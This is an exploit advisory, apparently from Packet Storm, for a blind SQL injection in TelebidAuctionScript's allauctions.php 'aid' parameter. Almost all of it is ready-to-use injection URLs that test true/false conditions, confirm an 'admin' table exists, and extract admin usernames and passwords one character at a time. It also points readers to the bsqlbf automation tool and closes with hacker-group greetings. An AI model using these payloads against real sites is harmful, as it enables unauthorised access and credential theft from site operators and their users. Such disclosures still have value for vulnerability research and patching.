TelebidAuctionScript suffers from a remote blind SQL injection vulnerability.
59ab906d8c6ed326d6283f7c3fd71a3584ec06568d9f68b05b91e3502cdee3ffTelebidauctionScript(aid) Blind SQL Injection Vulnerability
____________________________________
Author : Hussin X
Home : www.IQ-TY.com
email : darkangel_g85@Yahoo.com
____________________________________
Vendor : https://www.telebidauctionscript.com/
Demo :
_______
https://server/allauctions.php?aid=2+and+1=1 (true)
https://server/allauctions.php?aid=2+and+1=0 (false )
:: Table ::
https://server/allauctions.php?aid=2+and+(SELECT+1+from+admin+limit+0,1)=1
:: column pass and username ::
https://server/allauctions.php?aid=2+and+(SELECT+substring(concat(1,pass),1,1)+from+admin+limit 0,1)=1
https://server/allauctions.php?aid=2 and (SELECT+substring(concat(1,username),1,1) from admin limit 0,1)=1
note : Use the "bsqlbf" to write detailed information
Greetz
WwW.IQ-ty.CoM , Tryag.cc
| CraCkEr | Cyber-Zone | str0ke | jiko
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed